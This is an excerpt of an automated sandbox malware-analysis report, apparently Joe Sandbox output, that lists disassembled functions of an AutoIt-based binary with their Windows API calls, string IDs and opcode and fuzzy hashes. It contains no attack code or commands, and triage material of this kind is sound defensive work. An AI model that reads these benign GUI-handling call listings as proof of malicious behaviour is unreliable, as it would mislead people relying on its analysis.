                                                                                                                                                          • SendMessageW.USER32(?,000000B1,000F4240,000F423F), ref: 0018B6ED
                                                                                                                                                          • SendMessageW.USER32(?,00001002,00000000,?), ref: 0018B71E
                                                                                                                                                          • _memset.LIBCMT ref: 0018B743
                                                                                                                                                          • SendMessageW.USER32(00000000,00001060,00000001,00000004), ref: 0018B78C
                                                                                                                                                          • _memset.LIBCMT ref: 0018B7EB
                                                                                                                                                          • SendMessageW.USER32 ref: 0018B815
                                                                                                                                                          • SendMessageW.USER32(?,00001074,?,00000001), ref: 0018B86D
                                                                                                                                                          • SendMessageW.USER32(?,0000133D,?,?), ref: 0018B91A
                                                                                                                                                          • InvalidateRect.USER32(?,00000000,00000001), ref: 0018B93C
                                                                                                                                                          • GetMenuItemInfoW.USER32(?), ref: 0018B986
                                                                                                                                                          • SetMenuItemInfoW.USER32(?,?,00000000,00000030), ref: 0018B9B3
                                                                                                                                                          • DrawMenuBar.USER32(?), ref: 0018B9C2
                                                                                                                                                          • SetWindowTextW.USER32(?,0000014E), ref: 0018B9EA
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSend$Menu$InfoItemTextWindow_memset$CharDrawInvalidateNextRect
                                                                                                                                                          • String ID: 0
                                                                                                                                                          • API String ID: 1073566785-4108050209
                                                                                                                                                          • Opcode ID: 4373e8ba090a0ba34959a8fb469b2faef2d72fcadd14943c649e0a32b87af7ec
                                                                                                                                                          • Instruction ID: e150a60d9a99d667efa4f67c12c2bd18008050e959fab1f2ad64d10a2e59cff0
                                                                                                                                                          • Opcode Fuzzy Hash: 4373e8ba090a0ba34959a8fb469b2faef2d72fcadd14943c649e0a32b87af7ec
                                                                                                                                                          • Instruction Fuzzy Hash: F5E16B71904219ABDF25AFA1DCC4EEE7BB8FF05714F108156F919AB290DB748A81CF60
                                                                                                                                                          Function 0018744C Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 290windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetCursorPos.USER32(?), ref: 00187587
                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0018759C
                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 001875A3
                                                                                                                                                          • GetWindowLongW.USER32(?,000000F0), ref: 00187605
                                                                                                                                                          • DestroyWindow.USER32(?), ref: 00187631
                                                                                                                                                          • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,00000003,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 0018765A
                                                                                                                                                          • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00187678
                                                                                                                                                          • SendMessageW.USER32(?,00000439,00000000,00000030), ref: 0018769E
                                                                                                                                                          • SendMessageW.USER32(?,00000421,?,?), ref: 001876B3
                                                                                                                                                          • SendMessageW.USER32(?,0000041D,00000000,00000000), ref: 001876C6
                                                                                                                                                          • IsWindowVisible.USER32(?), ref: 001876E6
                                                                                                                                                          • SendMessageW.USER32(?,00000412,00000000,D8F0D8F0), ref: 00187701
                                                                                                                                                          • SendMessageW.USER32(?,00000411,00000001,00000030), ref: 00187715
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0018772D
                                                                                                                                                          • MonitorFromPoint.USER32(?,?,00000002), ref: 00187753
                                                                                                                                                          • GetMonitorInfoW.USER32 ref: 0018776D
                                                                                                                                                          • CopyRect.USER32(?,?), ref: 00187784
                                                                                                                                                          • SendMessageW.USER32(?,00000412,00000000), ref: 001877EF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
                                                                                                                                                          • String ID: ($0$tooltips_class32
                                                                                                                                                          • API String ID: 698492251-4156429822
                                                                                                                                                          • Opcode ID: 11b52c40827814489f1ebb5b6bee621be1fcfe251d915ef991111eefd3bf8144
                                                                                                                                                          • Instruction ID: 021d27658d651fe8e583c241eddf8d9dbfa7367c02706f153aa4845d479cd6ce
                                                                                                                                                          • Opcode Fuzzy Hash: 11b52c40827814489f1ebb5b6bee621be1fcfe251d915ef991111eefd3bf8144
                                                                                                                                                          • Instruction Fuzzy Hash: 7BB1BD71608700AFDB04EF64D988B6ABBE5FF98310F10891DF58A9B291DB70E904CF91
                                                                                                                                                          Function 0013A756 Relevance: 33.5, APIs: 18, Strings: 1, Instructions: 285windowtimeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0013A839
                                                                                                                                                          • GetSystemMetrics.USER32(00000007), ref: 0013A841
                                                                                                                                                          • SystemParametersInfoW.USER32(00000030,00000000,000000FF,00000000), ref: 0013A86C
                                                                                                                                                          • GetSystemMetrics.USER32(00000008), ref: 0013A874
                                                                                                                                                          • GetSystemMetrics.USER32(00000004), ref: 0013A899
                                                                                                                                                          • SetRect.USER32(000000FF,00000000,00000000,000000FF,000000FF), ref: 0013A8B6
                                                                                                                                                          • AdjustWindowRectEx.USER32(000000FF,00000000,00000000,00000000), ref: 0013A8C6
                                                                                                                                                          • CreateWindowExW.USER32(00000000,AutoIt v3 GUI,?,00000000,?,000000FF,000000FF,000000FF,?,00000000,00000000), ref: 0013A8F9
                                                                                                                                                          • SetWindowLongW.USER32(00000000,000000EB,00000000), ref: 0013A90D
                                                                                                                                                          • GetClientRect.USER32(00000000,000000FF), ref: 0013A92B
                                                                                                                                                          • GetStockObject.GDI32(00000011), ref: 0013A947
                                                                                                                                                          • SendMessageW.USER32(00000000,00000030,00000000), ref: 0013A952
                                                                                                                                                            • Part of subcall function 0013B736: GetCursorPos.USER32(000000FF), ref: 0013B749
                                                                                                                                                            • Part of subcall function 0013B736: ScreenToClient.USER32(00000000,000000FF), ref: 0013B766
                                                                                                                                                            • Part of subcall function 0013B736: GetAsyncKeyState.USER32(00000001), ref: 0013B78B
                                                                                                                                                            • Part of subcall function 0013B736: GetAsyncKeyState.USER32(00000002), ref: 0013B799
                                                                                                                                                          • SetTimer.USER32(00000000,00000000,00000028,0013ACEE), ref: 0013A979
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: System$MetricsRectWindow$AsyncClientInfoParametersState$AdjustCreateCursorLongMessageObjectScreenSendStockTimer
                                                                                                                                                          • String ID: AutoIt v3 GUI
                                                                                                                                                          • API String ID: 1458621304-248962490
                                                                                                                                                          • Opcode ID: 6a15d599361d9851bbbca2dbedf207cfceebc4bbfd85e1c454c564f5bf08ce20
                                                                                                                                                          • Instruction ID: ed50b3a3a53207960bab1ec6f10fb08b42cce07c669bcc3c79094a5bec83f90c
                                                                                                                                                          • Opcode Fuzzy Hash: 6a15d599361d9851bbbca2dbedf207cfceebc4bbfd85e1c454c564f5bf08ce20
                                                                                                                                                          • Instruction Fuzzy Hash: A2B17B71A0020AEFDB14DFA8DC85BAD7BB4FF08314F114229FA56A7690DB74E851CB51
                                                                                                                                                          Function 001869C5 Relevance: 26.5, APIs: 2, Strings: 13, Instructions: 281windowCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • CharUpperBuffW.USER32(?,?), ref: 00186A52
                                                                                                                                                          • SendMessageW.USER32(?,00001032,00000000,00000000), ref: 00186B12
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: BuffCharMessageSendUpper
                                                                                                                                                          • String ID: DESELECT$FINDITEM$GETITEMCOUNT$GETSELECTED$GETSELECTEDCOUNT$GETSUBITEMCOUNT$GETTEXT$ISSELECTED$SELECT$SELECTALL$SELECTCLEAR$SELECTINVERT$VIEWCHANGE
                                                                                                                                                          • API String ID: 3974292440-719923060
                                                                                                                                                          • Opcode ID: 2f612e85b348881578482f5d089bc00a7abb26eb3f380a113d60783aa885c418
                                                                                                                                                          • Instruction ID: 495a3266b33032f71446b360bc906a4e2dbd1b77560fc58305e011ae1e9c7d0a
                                                                                                                                                          • Opcode Fuzzy Hash: 2f612e85b348881578482f5d089bc00a7abb26eb3f380a113d60783aa885c418
                                                                                                                                                          • Instruction Fuzzy Hash: 2EA152306047019FCB08FF14D951A6AB7A5FF65354F14896DF8A6AB392DB30EE06CB81
                                                                                                                                                          Function 0015DD46 Relevance: 26.5, APIs: 14, Strings: 1, Instructions: 273windowtimeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0015DD87
                                                                                                                                                          • __swprintf.LIBCMT ref: 0015DE28
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015DE3B
                                                                                                                                                          • SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 0015DE90
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015DECC
                                                                                                                                                          • GetClassNameW.USER32(?,?,00000400), ref: 0015DF03
                                                                                                                                                          • GetDlgCtrlID.USER32(?), ref: 0015DF55
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0015DF8B
                                                                                                                                                          • GetParent.USER32(?), ref: 0015DFA9
                                                                                                                                                          • ScreenToClient.USER32(00000000), ref: 0015DFB0
                                                                                                                                                          • GetClassNameW.USER32(?,?,00000100), ref: 0015E02A
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015E03E
                                                                                                                                                          • GetWindowTextW.USER32(?,?,00000400), ref: 0015E064
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015E078
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: _wcscmp$ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf
                                                                                                                                                          • String ID: %s%u
                                                                                                                                                          • API String ID: 3119225716-679674701
                                                                                                                                                          • Opcode ID: 8b1e15c84486b10568a9b549f5bcfa2f64c44d2bc4ff9e38762da23cccea95fe
                                                                                                                                                          • Instruction ID: c4ea3d9f508cf8e111ea376c36f1a5d69241657d7bf66cd45980fb8ad4850921
                                                                                                                                                          • Opcode Fuzzy Hash: 8b1e15c84486b10568a9b549f5bcfa2f64c44d2bc4ff9e38762da23cccea95fe
                                                                                                                                                          • Instruction Fuzzy Hash: 7DA1D171604706EFDB18DF60D884BAAB7E8FF14311F004529FDAACA190DB70EA49CB91
                                                                                                                                                          Function 0015E69D Relevance: 26.5, APIs: 13, Strings: 2, Instructions: 249COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • GetClassNameW.USER32(00000008,?,00000400), ref: 0015E6E1
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015E6F2
                                                                                                                                                          • GetWindowTextW.USER32(00000001,?,00000400), ref: 0015E71A
                                                                                                                                                          • CharUpperBuffW.USER32(?,00000000), ref: 0015E737
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015E755
                                                                                                                                                          • _wcsstr.LIBCMT ref: 0015E766
                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0015E79E
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015E7AE
                                                                                                                                                          • GetWindowTextW.USER32(00000002,?,00000400), ref: 0015E7D5
                                                                                                                                                          • GetClassNameW.USER32(00000018,?,00000400), ref: 0015E81E
                                                                                                                                                          • _wcscmp.LIBCMT ref: 0015E82E
                                                                                                                                                          • GetClassNameW.USER32(00000010,?,00000400), ref: 0015E856
                                                                                                                                                          • GetWindowRect.USER32(00000004,?), ref: 0015E8BF
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: ClassName_wcscmp$Window$Text$BuffCharRectUpper_wcsstr
                                                                                                                                                          • String ID: @$ThumbnailClass
                                                                                                                                                          • API String ID: 1788623398-1539354611
                                                                                                                                                          • Opcode ID: cd6f5224e53d6454a25dbe33534c2bb3c5eac9ca3415958a10dbd19c11fea221
                                                                                                                                                          • Instruction ID: 8d9bbf490db928c8fbfb2efc207bb36deeb89c77749f6fdf19578f58248c1344
                                                                                                                                                          • Opcode Fuzzy Hash: cd6f5224e53d6454a25dbe33534c2bb3c5eac9ca3415958a10dbd19c11fea221
                                                                                                                                                          • Instruction Fuzzy Hash: AB81A171408305DBDB09CF10D881FAA7BE8FF54355F04846AFDAA9A091DB34DE49CBA1
                                                                                                                                                          Function 0015E4EA Relevance: 26.4, APIs: 3, Strings: 12, Instructions: 104COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          Strings
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: __wcsnicmp
                                                                                                                                                          • String ID: ACTIVE$ALL$CLASSNAME=$HANDLE=$LAST$REGEXP=$[ACTIVE$[ALL$[CLASS:$[HANDLE:$[LAST$[REGEXPTITLE:
                                                                                                                                                          • API String ID: 1038674560-1810252412
                                                                                                                                                          • Opcode ID: 389832f306d34b4f12a3a30aae80a9c38f2ad472a035ec1ecf26d24c17fe045c
                                                                                                                                                          • Instruction ID: a768f0548fda4b6d4e4b3a36ed1eefa41b255965dc737950fec7462e41a83c01
                                                                                                                                                          • Opcode Fuzzy Hash: 389832f306d34b4f12a3a30aae80a9c38f2ad472a035ec1ecf26d24c17fe045c
                                                                                                                                                          • Instruction Fuzzy Hash: 8131CD35A54215E6CB28EB50ED53EAE73A4AF31745F200026F871751E5FF616F18C621
                                                                                                                                                          Function 0015F898 Relevance: 25.7, APIs: 17, Instructions: 168windowtimeCOMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • LoadIconW.USER32(00000063), ref: 0015F8AB
                                                                                                                                                          • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0015F8BD
                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0015F8D4
                                                                                                                                                          • GetDlgItem.USER32(?,000003EA), ref: 0015F8E9
                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0015F8EF
                                                                                                                                                          • GetDlgItem.USER32(?,000003E9), ref: 0015F8FF
                                                                                                                                                          • SetWindowTextW.USER32(00000000,?), ref: 0015F905
                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 0015F926
                                                                                                                                                          • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 0015F940
                                                                                                                                                          • GetWindowRect.USER32(?,?), ref: 0015F949
                                                                                                                                                          • SetWindowTextW.USER32(?,?), ref: 0015F9B4
                                                                                                                                                          • GetDesktopWindow.USER32 ref: 0015F9BA
                                                                                                                                                          • GetWindowRect.USER32(00000000), ref: 0015F9C1
                                                                                                                                                          • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 0015FA0D
                                                                                                                                                          • GetClientRect.USER32(?,?), ref: 0015FA1A
                                                                                                                                                          • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 0015FA3F
                                                                                                                                                          • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 0015FA6A
                                                                                                                                                          Memory Dump Source
                                                                                                                                                          • Source File: 0000000F.00000002.2547467760.0000000000121000.00000040.00000001.01000000.00000009.sdmp, Offset: 00120000, based on PE: true
                                                                                                                                                          • Associated: 0000000F.00000002.2547158277.0000000000120000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001CE000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000001DA000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.000000000023E000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2547467760.00000000002C6000.00000040.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2549955151.00000000002CC000.00000080.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002CD000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.00000000002D4000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.000000000030D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          • Associated: 0000000F.00000002.2550284133.0000000000323000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                          • Snapshot File: hcaresult_15_2_120000_UNK_.jbxd
                                                                                                                                                          Similarity
                                                                                                                                                          • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                                                                                          • String ID:
                                                                                                                                                          • API String ID: 3869813825-0
                                                                                                                                                          • Opcode ID: 924299be749b354a5e3628b781e27d2679000afb718a4c27358c8dac347e1c28
                                                                                                                                                          • Instruction ID: 9e698c6e12001612f81597517e1091d7bb28daae11160d6ceb2462e1fcbfa372
                                                                                                                                                          • Opcode Fuzzy Hash: 924299be749b354a5e3628b781e27d2679000afb718a4c27358c8dac347e1c28
                                                                                                                                                          • Instruction Fuzzy Hash: CE513070900B09EFDB209FA4DD89FAEBBB5FF04705F00452CF596A69A0D774A949CB10
                                                                                                                                                          Function 001701E4 Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 237COMMON
                                                                                                                                                          Download Yara Rule
                                                                                                                                                          APIs
                                                                                                                                                          • _wcscpy.LIBCMT ref: 0017026A
                                                                                                                                                          • _wcschr.LIBCMT ref: 00170278
                                                                                                                                                          • _wcscpy.LIBCMT ref: 0017028F
                                                                                                                                                          • _wcscat.LIBCMT ref: 0017029E
                                                                                                                                                          • _wcscat.LIBCMT ref: 001702BC
                                                                                                                                                          • _wcscpy.LIBCMT ref: 001702DD
                                                                                                                                                          • __wsplitpath.LIBCMT ref: 001703BA
                                                                                                                                                          • _wcscpy.LIBCMT ref: 001703DF
                                                                                                                                                          • _wcscpy.LIBCMT ref: 001703F1
                                                                                                                                                          • _wcscpy.LIBCMT ref: 00170406
                                                                                                                                                          • _wcscat.LIBCMT ref: 0017041B
                                                                                                                                                          • _wcscat.LIBCMT ref: 0017042D
                                                                                                                                                          • _wcscat.LIBCMT ref: 00170442
                                                                                                                                                            • Part of subcall function 0016C890: _wcscmp.LIBCMT ref: 0016C92A
                                                                                                                                                            • Part of subcall function 0016C890: __wsplitpath.LIBCMT ref: 0016C96F
                                                                                                                                                            • Part of subcall function 0016C890: _wcscpy.LIBCMT ref: 0016C982
                                                                                                                                                            • Part of subcall function 0016C890: _wcscat.LIBCMT ref: 0016C995
                                                                                                                                                            • Part of subcall function 0016C890: __wsplitpath.LIBCMT ref: 0016C9BA
                                                                                                                                                            • Part of subcall function 0016C890: _wcscat.LIBCMT ref: 0016C9D0
